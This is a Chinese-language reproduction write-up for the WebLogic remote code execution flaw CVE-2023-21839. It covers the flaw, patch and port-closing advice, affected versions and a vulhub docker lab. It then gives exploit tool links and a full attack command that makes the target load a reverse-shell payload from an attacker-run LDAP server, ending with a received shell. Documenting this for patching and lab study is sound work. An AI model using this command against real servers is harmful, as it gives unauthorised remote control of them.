漏洞阐述

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器，在全球范围内被广泛使用。1月18日，Oracle发布安全公告，修复了一个存在于WebLogic Core中的远程代码执行漏洞（CVE-2023-21839），该漏洞的CVSSv3评分为7.5，可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server，成功利用该漏洞可能导致未授权访问和敏感信息泄露。

解决建议

1、安装Oracle WebLogic Server最新安全补丁：

https://www.oracle.com/security-alerts/cpujan2023.html

2、关闭T3和iiop协议端口，操作方法参考：

https://help.aliyun.com/noticelist/articleid/1060577901.html

影响版本

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

环境搭建

这里推荐使用docker ＋ vulhub 简单粗暴

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2020-14882

这里使用docker在vps上搭建完成后，打开地址http://xx.xx.xx:7001

漏洞复现

先下载利用工具

https://github.com/WhiteHSBG/JNDIExploit

https://github.com/4ra1n/CVE-2023-21839

然后在vps上使用JNDIExp开启ldap协议服务，这里注意 1389跟3456端口开放，然后java最好为低版本，我使用17版本未复现成功，8版本成功复现

同时开启端口监听

在本机使用CVE-2023-21839工具发起exp攻击

main.exe -ip xx.xx.xx.xx -port 7001 -ldap ldap://xx.xx.xx.xx:1389/Basic/ReverseShell/xx.xx.xx.xx/10086

攻击成功

收到shell